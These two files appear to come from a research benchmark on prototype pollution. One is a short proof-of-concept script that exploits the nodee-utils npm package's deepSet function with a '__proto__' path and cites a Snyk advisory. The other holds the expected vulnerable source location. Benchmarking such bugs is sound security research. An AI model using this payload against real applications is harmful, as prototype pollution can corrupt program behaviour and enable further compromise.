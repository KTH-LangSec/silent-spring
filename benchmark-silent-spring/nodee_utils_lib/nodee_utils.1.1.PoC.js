//https://snyk.io/vuln/SNYK-JS-NODEEUTILS-598679

const { object } = require('nodee-utils');

object.deepSet({}, '__proto__.polluted', "yes");
  