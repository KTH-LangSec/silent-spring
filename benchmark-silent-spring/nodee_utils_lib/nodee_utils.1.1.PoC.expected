node_modules/nodee-utils/lib/object.js:210:40